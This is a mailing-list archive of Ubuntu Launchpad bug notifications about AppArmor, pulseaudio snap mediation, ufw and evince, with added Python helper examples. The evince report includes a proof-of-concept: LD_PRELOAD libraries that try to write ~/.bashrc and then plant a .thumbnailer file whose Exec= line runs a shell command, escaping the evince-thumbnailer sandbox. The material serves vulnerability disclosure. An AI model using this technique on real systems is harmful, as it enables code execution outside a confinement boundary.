[Group.of.nepali.translators] [Bug 1890848] [NEW] 'ptrace trace' needed to readlink() /proc/*/ns/* files
Public bug reported:

Per 'man namespaces': "Permission to dereference or read (readlink(2)) these symbolic links is governed by a ptrace access mode PTRACE_MODE_READ_FSCREDS check; see ptrace(2)." This suggests that a 'ptrace read' rule should be sufficient to readlink() /proc/*/ns/*, which is the case with 5.4.0-42.46-generic (Ubuntu 20.04 LTS). However, on Ubuntu 18.04 LTS and 16.04 LTS, 'ptrace trace' is needed.

Here is a reproducer:

$ cat ./readlink-ns.c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

void usage() {
    fprintf(stderr, "Usage: readlink-ns -p <pid> -n <ns>\n");
}

int main(int argc, char *argv[]) {
    pid_t pid = 0;
    char *ns = NULL;
    char path[PATH_MAX] = {};
    char rpath[PATH_MAX] = {};
    int c;

    while ((c = getopt(argc, argv, "hn:p:")) != -1) {
        switch(c) {
        case 'n':
            ns = optarg;
            break;
        case 'p':
            pid = atoi(optarg);
            break;
        case 'h':
            usage();
            return 0;
        case '?':
            usage();
            return 1;
        default:
            return 1;
        }
    }

    /* both options are required; a NULL ns would be passed to %s below */
    if (ns == NULL || pid <= 0) {
        usage();
        return 1;
    }

    int n = snprintf(path, sizeof(path), "/proc/%d/ns/%s", pid, ns);
    if (n < 0 || (size_t)n >= sizeof(path)) {
        fprintf(stderr, "cannot format string\n");
        return 1;
    }
    path[n] = '\0';
    printf("path: %s\n", path);

    /* readlink() does not NUL-terminate; rpath is zero-filled, so a result
     * shorter than the buffer is terminated, a full buffer means truncation */
    n = readlink(path, rpath, sizeof(rpath));
    if (n < 0) {
        perror("readlink()");
        return 1;
    } else if ((size_t)n == sizeof(rpath)) {
        fprintf(stderr, "cannot readlink()\n");
        return 1;
    }
    printf("rpath: %s\n", rpath);

    return 0;
}

$ cat ./readlink-ns.apparmor
#include <tunables/global>
profile test {
  #include <abstractions/base>

  # focal
  ptrace (read) peer="unconfined",

  # xenial, bionic
  #ptrace (trace) peer="unconfined",
}

# bionic and xenial need 'ptrace trace'
$ gcc ./readlink-ns.c && sudo apparmor_parser -r ./readlink-ns.apparmor && sudo aa-exec -p test -- ./a.out -p 1 -n pid
path: /proc/1/ns/pid
readlink(): Permission denied

Denial:
Aug 07 14:40:59 sec-bionic-amd64 kernel: audit: type=1400 audit(1596829259.675:872): apparmor="DENIED" operation="ptrace" profile="test" pid=1311 comm="a.out" requested_mask="trace" denied_mask="trace" peer="unconfined"

# focal needs only 'ptrace read'
$ gcc ./readlink-ns.c && sudo apparmor_parser -r ./readlink-ns.apparmor && sudo aa-exec -p test -- ./a.out -p 1 -n pid
path: /proc/1/ns/pid
rpath: pid:[4026531836]

** Affects: linux (Ubuntu)
     Importance: Undecided
         Status: Fix Released

** Affects: linux (Ubuntu Xenial)
     Importance: Undecided
         Status: Confirmed

** Affects: linux (Ubuntu Bionic)
     Importance: Undecided
         Status: Confirmed

** Tags: apparmor

** Also affects: linux (Ubuntu Bionic)
     Importance: Undecided
         Status: New

** Also affects: linux (Ubuntu Xenial)
     Importance: Undecided
         Status: New

** Changed in: linux (Ubuntu)
       Status: New => Fix Released

** Tags added: apparmor

** Changed in: linux (Ubuntu Bionic)
       Status: New => Confirmed

** Changed in: linux (Ubuntu Xenial)
       Status: New => Confirmed

-- 
You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह (Nepali Language Coordinators' Group), which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1890848

Title:
  'ptrace trace' needed to readlink() /proc/*/ns/* files

Status in linux package in Ubuntu: Fix Released
Status in linux source package in Xenial: Confirmed
Status in linux source package in Bionic: Confirmed
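The denial line above already names the rule that would satisfy it (operation, mask and peer), and the same is true of the file denial quoted further down this page for evince-thumbnailer. The following Python is an added example, not part of the bug report or of the AppArmor tools: it parses both DENIED lines quoted on this page (copied here as constructed sample input) and derives the candidate rule from the audit fields. The field names are the ones AppArmor emits; the mapping to rule syntax, and the use of `owner` when fsuid equals ouid, are this example's own simplification.

```python
import re

# Sample input: the two DENIED lines quoted on this page, copied here verbatim
# as constructed test data.
SAMPLE_LINES = [
    'Aug 07 14:40:59 sec-bionic-amd64 kernel: audit: type=1400 audit(1596829259.675:872): '
    'apparmor="DENIED" operation="ptrace" profile="test" pid=1311 comm="a.out" '
    'requested_mask="trace" denied_mask="trace" peer="unconfined"',
    '[ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" '
    'operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" '
    'pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000',
]

# key=value pairs; values are either double-quoted or a bare token
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_audit(line):
    """Return the key=value fields of one AppArmor audit line as a dict, quotes stripped."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}

def suggest_rule(fields):
    """Map a DENIED record to the narrowest rule that would have allowed it, or None.

    Only 'ptrace' and path-based operations (those carrying a name= field) are
    handled. The mask is taken from denied_mask, so accesses that were partly
    granted do not re-request what the profile already allows.
    """
    if fields.get("apparmor") != "DENIED":
        return None
    mask = fields.get("denied_mask") or fields.get("requested_mask")
    if not mask:
        return None
    if fields.get("operation") == "ptrace":
        peer = fields.get("peer")
        if not peer:
            return None
        # 'trace' is far broader than 'read': it lets the confined task attach to
        # the peer, which is why needing it just for readlink() is a bug.
        return 'ptrace (%s) peer="%s",' % (mask, peer)
    if "name" in fields:
        # Use 'owner' when the accessing fsuid owns the object, so the rule does
        # not widen access to other users' files.
        owner = "owner " if "fsuid" in fields and fields["fsuid"] == fields.get("ouid") else ""
        return "%s%s %s," % (owner, fields["name"], mask)
    return None

def suggest_all(lines):
    """Parse every line and return (profile, suggested_rule) pairs for the ones handled."""
    out = []
    for line in lines:
        f = parse_audit(line)
        rule = suggest_rule(f)
        if rule:
            out.append((f.get("profile"), rule))
    return out

if __name__ == "__main__":
    for profile, rule in suggest_all(SAMPLE_LINES):
        print("%s: %s" % (profile, rule))
```

A suggested allow rule only helps when the denial came from a missing rule. The evince-thumbnailer line is a denial from an explicit `deny` rule, which wins over any allow you add, and the audit record alone does not tell the two cases apart; check the profile before pasting the suggestion in.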
[Group.of.nepali.translators] [Bug 1781428] Re: please enable snap mediation support
** Description changed:

+ [Impact]
+ Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.
- # Original summary: pulseaudio built with --enable-snappy but 'Enable
- Snappy support: no'
+ To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).
+
+ The patch to pulseaudio consists of adding a module, enabling it in default.pa and then, when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.
+
+ [Test Case]
+
+ Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su
+
+ For unconfined applications:
+ $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
+ yes
+
+ $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
+ ^Cyes
+
+ $ paplay /tmp/out.wav && echo "yes"
+ yes
+
+ For confined, non-snap applications:
+ $ sudo apt-get install evince
+
+ $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
+
+ $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
+ ^Cyes
+
+ $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
+ yes
+
+ For classic snaps:
+ $ sudo snap install test-snapd-classic-confinement --classic
+
+ $ snap run --shell test-snapd-classic-confinement
+
+ $ cat /proc/self/attr/current # verify we are classic confined
+ snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
+
+ $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
+ yes
+
+ $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
+ ^Cyes
+
+ $ paplay /tmp/out.wav && echo "yes"
+ yes
+
+ For strict snaps with pulseaudio:
+ $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap
+
+ $ snap connections test-snapd-pulseaudio
+ Interface   Plug                              Slot         Notes
+ pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
+
+ $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
+ ...
+
+ $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
+
+ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
+ xcb_connection_has_error() returned true
+ yes
+
+ (note, the xcb_connection_has_error() message is due to the x11 interface not being connected, which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
+
+ $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
+ ...
+ ^Cyes
+
+ $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
+ ...
+ yes
+
+ For strict snaps with audio-playback/audio-record:
+ $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap
+
+ $ snap connections test-snapd-audio-record # record not connected
+ Interface       Plug                                    Slot             Notes
+ audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
+ audio-record    test-snapd-audio-record:audio-record    -                -
+
+ $ test-snapd-audio-record.play --help # ensure SNAP dirs are created
+ ...
+
+ $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio-record/common/
+
+ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
+ xcb_connection_has_error() returned true
+ yes
+
+ (note, the xcb_connection_has_error() message is due to the x11 interface not being connected, which is un
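The test case above exercises four client kinds against one decision: playback for everyone, record only for non-snap clients, classic snaps, and strict snaps with pulseaudio or audio-record connected. The following Python is an added example, not the pulseaudio module or any snapd code: it parses the security label in the form `/proc/<pid>/attr/current` shows it (including the "(complain)" suffix seen for the classic snap above), extracts the snap name, and applies that policy. The snapd answers are a constructed in-memory table standing in for the control-socket query the description refers to; failing closed for a snap that snapd does not know is this example's choice.

```python
import re

# '/proc/<pid>/attr/current' holds the AppArmor label, optionally followed by the
# profile mode in parentheses, e.g. "snap.foo.app (complain)" or "unconfined".
LABEL_RE = re.compile(r"^(?P<label>\S+)(?:\s+\((?P<mode>\w+)\))?$")

def parse_security_label(raw):
    """Split the attr/current text into (label, mode); unconfined has no mode."""
    m = LABEL_RE.match(raw.strip())
    if not m:
        raise ValueError("unparseable security label: %r" % raw)
    return m.group("label"), m.group("mode")

def snap_name(label):
    """'snap.<snap>.<app>' -> '<snap>'; None when the label is not a snap's."""
    if not label.startswith("snap."):
        return None
    parts = label.split(".", 2)
    return parts[1] if len(parts) > 1 and parts[1] else None

# Constructed stand-in for the answers pulseaudio would get from snapd over its
# control socket (the real module uses snapd-glib). Keyed by snap name; the
# entries mirror the three test snaps in the test case above.
FAKE_SNAPD = {
    "test-snapd-classic-confinement": {"confinement": "classic", "connected": set()},
    "test-snapd-pulseaudio":          {"confinement": "strict",  "connected": {"pulseaudio"}},
    "test-snapd-audio-record":        {"confinement": "strict",  "connected": {"audio-playback"}},
}

# either of these interfaces, when connected, permits recording
RECORD_INTERFACES = {"pulseaudio", "audio-record"}

def mediate(raw_label, op, snapd=FAKE_SNAPD):
    """Decide whether a client with this label may 'play' or 'record'.

    Playback is allowed to every client. Record is allowed for non-snap
    clients, for classic snaps, and for strict snaps that have pulseaudio or
    audio-record connected. Snaps unknown to snapd fail closed.
    """
    if op not in ("play", "record"):
        raise ValueError("unknown operation %r" % op)
    if op == "play":
        return True
    label, _mode = parse_security_label(raw_label)
    name = snap_name(label)
    if name is None:
        return True          # unconfined or a non-snap profile: not mediated here
    info = snapd.get(name)
    if info is None:
        return False         # snapd does not know the snap: fail closed
    if info["confinement"] == "classic":
        return True
    return bool(info["connected"] & RECORD_INTERFACES)

if __name__ == "__main__":
    for raw in ("unconfined",
                "/usr/bin/evince (enforce)",
                "snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)",
                "snap.test-snapd-pulseaudio.record (enforce)",
                "snap.test-snapd-audio-record.record (enforce)"):
        print("%-80s play=%s record=%s" % (raw, mediate(raw, "play"), mediate(raw, "record")))
```

The label prefix is the only thing that distinguishes a snap from any other confined client, so a non-snap AppArmor profile such as /usr/bin/evince is treated exactly like unconfined, which is what the "confined, non-snap applications" step of the test case checks.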
[Group.of.nepali.translators] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
Ubuntu 14.04 LTS is now out of standard support and evince is not included in ESM.

** Changed in: evince (Ubuntu Trusty)
       Status: In Progress => Won't Fix

-- 
https://bugs.launchpad.net/bugs/1788929

Title:
  Debian/Ubuntu AppArmor policy gaps in evince

Status in AppArmor: Fix Released
Status in apparmor package in Ubuntu: Fix Released
Status in evince package in Ubuntu: Fix Released
Status in apparmor source package in Trusty: Fix Released
Status in evince source package in Trusty: Won't Fix
Status in apparmor source package in Xenial: Fix Released
Status in evince source package in Xenial: In Progress
Status in apparmor source package in Bionic: Fix Released
Status in evince source package in Bionic: In Progress
Status in apparmor source package in Cosmic: Fix Released
Status in evince source package in Cosmic: Fix Released

Bug description:
  [Note on coordination: I'm reporting this as a security bug to both Ubuntu (because Ubuntu is where this policy originally comes from, and Ubuntu is also where AppArmor is most relevant) and Debian (because the AppArmor policy has been merged into Debian's version of the package). It isn't clear to me who really counts as upstream here...]

  Debian/Ubuntu ship with an AppArmor policy for evince, which, among other things, restricts evince-thumbnailer. The Ubuntu security team seems to incorrectly believe that this policy provides meaningful security isolation:
  https://twitter.com/alex_murray/status/1032780425834446849
  https://twitter.com/alex_murray/status/1032796879640190976

  This AppArmor policy seems to be designed to permit everything that evince-thumbnailer might need; however, it does not seem to be designed to establish a consistent security boundary around evince-thumbnailer. For example, read+write access to almost the entire home directory is granted:

  /usr/bin/evince-thumbnailer {
  [...]
    # Lenient, but remember we still have abstractions/private-files-strict in
    # effect).
    @{HOME}/ r,
    owner @{HOME}/** rw,
    owner /media/** rw,
  }

  As the comment notes, a couple files are excluded to prevent you from just overwriting well-known executable scripts in the user's home directory, like ~/.bashrc:

  [...]
    # don't allow reading/updating of run control files
    deny @{HOME}/.*rc mrk,
    audit deny @{HOME}/.*rc wl,
    # bash
    deny @{HOME}/.bash* mrk,
    audit deny @{HOME}/.bash* wl,
    deny @{HOME}/.inputrc mrk,
    audit deny @{HOME}/.inputrc wl,
  [...]

  Verification:

  user@ubuntu-18-04-vm:~$ cat preload2.c
  #define _GNU_SOURCE
  #include <err.h>
  #include <errno.h>
  #include <fcntl.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <sys/stat.h>
  #include <unistd.h>

  /* runs at library load, before the host program's main(), via LD_PRELOAD */
  __attribute__((constructor)) static void entry(void) {
    printf("constructor running from %s\n", program_invocation_name);
    int fd = open("/home/user/.bashrc", O_WRONLY);
    if (fd != -1) {
      printf("success\n");
    } else {
      perror("open .bashrc");
    }
    exit(0);
  }
  user@ubuntu-18-04-vm:~$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/libevil_preload.so preload2.c -fPIC
  user@ubuntu-18-04-vm:~$ LD_PRELOAD=/usr/lib/x86_64-linux-gnu/libevil_preload.so evince-thumbnailer
  constructor running from evince-thumbnailer
  open .bashrc: Permission denied
  user@ubuntu-18-04-vm:~$ dmesg|tail -n1
  [ 6900.355399] audit: type=1400 audit(1535126396.280:113): apparmor="DENIED" operation="open" profile="/usr/bin/evince-thumbnailer" name="/home/user/.bashrc" pid=4807 comm="evince-thumbnai" requested_mask="w" denied_mask="w" fsuid=1000 ouid=1000

  But of course blacklists are brittle and often trivially bypassable. For example, did you know that it is possible to override the system's thumbnailers by dropping .thumbnailer files in ~/.local/share/ ? .thumbnailer files contain command lines that will be executed by nautilus. To demonstrate that it is possible to create .thumbnailer files from evince-thumbnailer:

  user@ubuntu-18-04-vm:~$ ls -la .local/share/thumbnailers/
  ls: cannot access '.local/share/thumbnailers/': No such file or directory
  user@ubuntu-18-04-vm:~$ cat preload3.c
  #define _GNU_SOURCE
  #include <err.h>
  #include <errno.h>
  #include <fcntl.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <sys/stat.h>
  #include <unistd.h>

  /* runs at library load, before the host program's main(), via LD_PRELOAD */
  __attribute__((constructor)) static void entry(void) {
    printf("constructor running from %s\n", program_invocation_name);
    if (mkdir("/home/user/.local/share/thumbnailers", 0777) && errno != EEXIST)
      err(1, "mkdir");
    FILE *f = fopen("/home/user/.local/share/thumbnailers/evil.thumbnailer", "w");
    if (!f)
      err(1, "create");
    fputs("[Thumbnailer Entry]\n", f);
    fputs("Exec=find /etc/passwd -name passwd -exec gnome-terminal -- sh -c id;cat [...]
  }

  As a comment in abstractions/dbus-session explains:

  # This a
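To see why the deny-list leaves exactly that gap, it helps to evaluate paths against the quoted rules the way AppArmor resolves them: an explicit deny wins over any allow, `**` crosses directory boundaries, `*` and `?` do not. The following Python is an added example, not code from the bug report or from the AppArmor project. It loads only the rules quoted above (the real profile also pulls in abstractions such as private-files-strict, which are not modeled), assumes @{HOME} expands to /home/* and /root as in the stock tunables, and treats the `owner` qualifier as satisfied (the probed files are the user's own). The probe paths are the ones the report uses.

```python
import re

# The rules quoted from the evince-thumbnailer profile above. The real profile
# also includes abstractions (e.g. private-files-strict) that are not modeled.
PROFILE_EXCERPT = """
@{HOME}/ r,
owner @{HOME}/** rw,
owner /media/** rw,
# don't allow reading/updating of run control files
deny @{HOME}/.*rc mrk,
audit deny @{HOME}/.*rc wl,
# bash
deny @{HOME}/.bash* mrk,
audit deny @{HOME}/.bash* wl,
deny @{HOME}/.inputrc mrk,
audit deny @{HOME}/.inputrc wl,
"""

# Assumed expansion of @{HOME}, matching the stock tunables/home (/home/*/ and /root/).
HOME_EXPANSIONS = ("/home/*", "/root")
MODIFIERS = ("audit", "deny", "owner")

def glob_to_regex(pattern):
    """AppArmor path glob -> anchored regex: '**' may cross '/', '*' and '?' may not."""
    out, i = [], 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            out.append(".*"); i += 2
        elif pattern[i] == "*":
            out.append("[^/]*"); i += 1
        elif pattern[i] == "?":
            out.append("[^/]"); i += 1
        else:
            out.append(re.escape(pattern[i])); i += 1
    return re.compile("^" + "".join(out) + "$")

def parse_rules(text):
    """Return [(is_deny, compiled_glob, set_of_perm_chars)], expanding @{HOME}."""
    rules = []
    for line in text.splitlines():
        line = line.strip().rstrip(",")
        if not line or line.startswith("#"):
            continue
        words = line.split()
        deny = False
        while words[0] in MODIFIERS:
            # 'audit' only changes logging; 'owner' is assumed satisfied for these probes
            deny |= words.pop(0) == "deny"
        glob, perms = words
        globs = [glob.replace("@{HOME}", h) for h in HOME_EXPANSIONS] if "@{HOME}" in glob else [glob]
        rules.extend((deny, glob_to_regex(g), set(perms)) for g in globs)
    return rules

RULES = parse_rules(PROFILE_EXCERPT)

def check(path, perm, rules=RULES):
    """'deny' if an explicit deny rule covers the access, 'allow' if only allow
    rules do, 'implicit-deny' if no rule mentions it. Deny always wins."""
    hits = [deny for deny, rx, perms in rules if perm in perms and rx.match(path)]
    if any(hits):
        return "deny"
    return "allow" if hits else "implicit-deny"

def audit(paths, perm="w"):
    """Map each probe path to its verdict for one permission; an 'allow' on a
    path that yields code execution is the kind of gap the report describes."""
    return {p: check(p, perm) for p in paths}

if __name__ == "__main__":
    probes = ["/home/user/.bashrc",
              "/home/user/.local/share/thumbnailers/",
              "/home/user/.local/share/thumbnailers/evil.thumbnailer",
              "/etc/passwd"]
    for p, verdict in audit(probes).items():
        print("%-60s %s" % (p, verdict))
```

The two thumbnailer paths come back "allow" for write because nothing in the deny-list mentions them, while `owner @{HOME}/** rw,` covers everything under the home directory; the `mkdir` and `fopen` in preload3.c succeed for the same reason the `open` in preload2.c fails.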
[Group.of.nepali.translators] [Bug 1726856] Re: ufw does not start automatically at boot
@Matt you have both ufw and firewalld installed and running. You should disable/remove firewalld. Marking this as 'Invalid' for now, but please feel free to report back if you still see a bug in ufw after addressing firewalld.

** Changed in: ufw
       Status: Incomplete => Invalid

** Changed in: ufw (Ubuntu Disco)
       Status: Incomplete => Invalid

** Changed in: ufw (Ubuntu Cosmic)
       Status: Incomplete => Invalid

** Changed in: ufw (Ubuntu Bionic)
       Status: Incomplete => Invalid

** Changed in: ufw (Ubuntu Xenial)
       Status: Incomplete => Invalid

-- 
https://bugs.launchpad.net/bugs/1726856

Title:
  ufw does not start automatically at boot

Status in ufw: Invalid
Status in ufw package in Ubuntu: Invalid
Status in ufw source package in Xenial: Invalid
Status in ufw source package in Bionic: Invalid
Status in ufw source package in Cosmic: Invalid
Status in ufw source package in Disco: Invalid

Bug description:
  Whenever I boot into 17.10 ufw is always inactive, even though /etc/ufw/ufw.conf has this:

  # Set to yes to start on boot. If setting this remotely, be sure to add a rule
  # to allow your remote connection before starting ufw. Eg: 'ufw allow 22/tcp'
  ENABLED=yes

  ProblemType: Bug
  DistroRelease: Ubuntu 17.10
  Package: ufw 0.35-5
  ProcVersionSignature: Ubuntu 4.13.0-16.19-generic 4.13.4
  Uname: Linux 4.13.0-16-generic x86_64
  ApportVersion: 2.20.7-0ubuntu3
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Oct 24 13:56:40 2017
  InstallationDate: Installed on 2015-04-01 (936 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 (20140722.2)
  PackageArchitecture: all
  SourcePackage: ufw
  UpgradeStatus: Upgraded to artful on 2017-10-24 (0 days ago)
  mtime.conffile..etc.default.ufw: 2015-06-17T22:01:02.089170

To manage notifications about this bug go to:
https://bugs.launchpad.net/ufw/+bug/1726856/+subscriptions

___
Mailing list: https://launchpad.net/~group.of.nepali.translators
Post to     : group.of.nepali.translators@lists.launchpad.net
Unsubscribe : https://launchpad.net/~group.of.nepali.translators
More help   : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1726856] Re: ufw does not start automatically at boot
@Matt, there aren't any errors in your journalctl output that I can see. Without removing the change to /lib/ufw/ufw-init yet, can you reboot until you see the problem, and then before you correct the issue, can you attach the output of all of the following:

1. journalctl --no-pager > /tmp/journal.full
2. dpkg -l > /tmp/dpkg.list
3. sudo tar -zcf /tmp/ufw.tar.gz /lib/ufw/ /etc/default/ufw /etc/ufw/ /usr/share/ufw/
4. sudo ufw show raw > /tmp/ufw.raw

** Also affects: ufw (Ubuntu Disco)
     Importance: Undecided
         Status: New

** Changed in: ufw (Ubuntu Xenial)
       Status: New => Incomplete

** Changed in: ufw (Ubuntu Bionic)
       Status: New => Incomplete

** Changed in: ufw (Ubuntu Cosmic)
       Status: New => Incomplete

** Changed in: ufw (Ubuntu Disco)
       Status: New => Incomplete

-- 
https://bugs.launchpad.net/bugs/1726856

Title:
  ufw does not start automatically at boot

Status in ufw: Incomplete
Status in ufw package in Ubuntu: Incomplete
Status in ufw source package in Xenial: Incomplete
Status in ufw source package in Bionic: Incomplete
Status in ufw source package in Cosmic: Incomplete
Status in ufw source package in Disco: Incomplete
[Group.of.nepali.translators] [Bug 1726856] Re: ufw does not start automatically at boot
For those experiencing this issue, can you adjust /lib/ufw/ufw-init to use this:

#!/bin/sh -x

on its first line instead of:

#!/bin/sh

Then reboot until you see the issue. When you do, please use `journalctl --no-pager --unit=ufw` and attach the results. Thanks!

** Changed in: ufw
       Status: Triaged => Incomplete

** Changed in: ufw
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: ufw (Ubuntu)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: ufw (Ubuntu Xenial)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: ufw (Ubuntu Artful)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: ufw (Ubuntu Bionic)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: ufw (Ubuntu Cosmic)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** No longer affects: ufw (Ubuntu Artful)

** Changed in: ufw (Ubuntu)
       Status: Triaged => Incomplete

** Changed in: ufw (Ubuntu Xenial)
       Status: Triaged => Incomplete

** Changed in: ufw (Ubuntu Bionic)
       Status: Triaged => Incomplete

** Changed in: ufw (Ubuntu Cosmic)
       Status: Triaged => New

** Changed in: ufw (Ubuntu Bionic)
       Status: Incomplete => New

** Changed in: ufw (Ubuntu Xenial)
       Status: Incomplete => New

** Changed in: ufw (Ubuntu)
       Status: Incomplete => New

-- 
https://bugs.launchpad.net/bugs/1726856

Title:
  ufw does not start automatically at boot

Status in ufw: Incomplete
Status in ufw package in Ubuntu: New
Status in ufw source package in Xenial: New
Status in ufw source package in Bionic: New
Status in ufw source package in Cosmic: New
[Group.of.nepali.translators] [Bug 1788929] Re: Debian/Ubuntu AppArmor policy gaps in evince
I referenced the wrong bug in the evince upload so it didn't auto-close, but 3.30.0-3ubuntu1 should address this.

** Changed in: evince (Ubuntu Cosmic)
       Status: Fix Committed => Fix Released

** Changed in: evince (Ubuntu Trusty)
       Status: Triaged => In Progress

** Changed in: evince (Ubuntu Xenial)
       Status: Triaged => In Progress

** Changed in: evince (Ubuntu Bionic)
       Status: Triaged => In Progress

-- 
https://bugs.launchpad.net/bugs/1788929

Title:
  Debian/Ubuntu AppArmor policy gaps in evince

Status in AppArmor: Fix Released
Status in apparmor package in Ubuntu: Fix Released
Status in evince package in Ubuntu: Fix Released
Status in apparmor source package in Trusty: Fix Committed
Status in evince source package in Trusty: In Progress
Status in apparmor source package in Xenial: Fix Committed
Status in evince source package in Xenial: In Progress
Status in apparmor source package in Bionic: Fix Committed
Status in evince source package in Bionic: In Progress
Status in apparmor source package in Cosmic: Fix Released
Status in evince source package in Cosmic: Fix Released
[Group.of.nepali.translators] [Bug 1794848] Re: private-files-strict abstraction should also limit access to directories
https://gitlab.com/apparmor/apparmor/merge_requests/203/ was committed upstream.

** Changed in: apparmor
       Status: In Progress => Fix Released

** Summary changed:

- private-files-strict abstraction should also limit access to directories
+ private-files-strict and user-files abstractions should also limit access to directories

-- 
https://bugs.launchpad.net/bugs/1794848

Title:
  private-files-strict and user-files abstractions should also limit access to directories

Status in AppArmor: Fix Released
Status in apparmor package in Ubuntu: In Progress
Status in apparmor source package in Trusty: Triaged
Status in apparmor source package in Xenial: Triaged
Status in apparmor source package in Bionic: Triaged
Status in apparmor source package in Cosmic: In Progress

Bug description:
  This is to track the private-files-strict and user-files portion of https://bugs.launchpad.net/apparmor/+bug/1794820
[Group.of.nepali.translators] [Bug 1794848] [NEW] private-files-strict abstraction should also limit access to directories
Public bug reported:

This is to track the private-files-strict and user-files portion of https://bugs.launchpad.net/apparmor/+bug/1794820

** Affects: apparmor
     Importance: Undecided
       Assignee: Jamie Strandboge (jdstrand)
         Status: Fix Released

** Affects: apparmor (Ubuntu)
     Importance: Undecided
       Assignee: Jamie Strandboge (jdstrand)
         Status: In Progress

** Affects: apparmor (Ubuntu Trusty)
     Importance: Undecided
       Assignee: Jamie Strandboge (jdstrand)
         Status: Triaged

** Affects: apparmor (Ubuntu Xenial)
     Importance: Undecided
       Assignee: Jamie Strandboge (jdstrand)
         Status: Triaged

** Affects: apparmor (Ubuntu Bionic)
     Importance: Undecided
       Assignee: Jamie Strandboge (jdstrand)
         Status: Triaged

** Affects: apparmor (Ubuntu Cosmic)
     Importance: Undecided
       Assignee: Jamie Strandboge (jdstrand)
         Status: In Progress

** Also affects: apparmor (Ubuntu Cosmic)
     Importance: Undecided
         Status: New

** Also affects: apparmor (Ubuntu Trusty)
     Importance: Undecided
         Status: New

** Also affects: apparmor (Ubuntu Bionic)
     Importance: Undecided
         Status: New

** Also affects: apparmor (Ubuntu Xenial)
     Importance: Undecided
         Status: New

** Changed in: apparmor (Ubuntu Trusty)
       Status: New => Triaged

** Changed in: apparmor (Ubuntu Xenial)
       Status: New => Triaged

** Changed in: apparmor (Ubuntu Bionic)
       Status: New => Triaged

** Changed in: apparmor (Ubuntu Cosmic)
       Status: New => Triaged

** Changed in: apparmor (Ubuntu Trusty)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: apparmor (Ubuntu Xenial)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: apparmor (Ubuntu Bionic)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: apparmor (Ubuntu Cosmic)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: apparmor (Ubuntu Cosmic)
       Status: Triaged => In Progress

** Also affects: apparmor
     Importance: Undecided
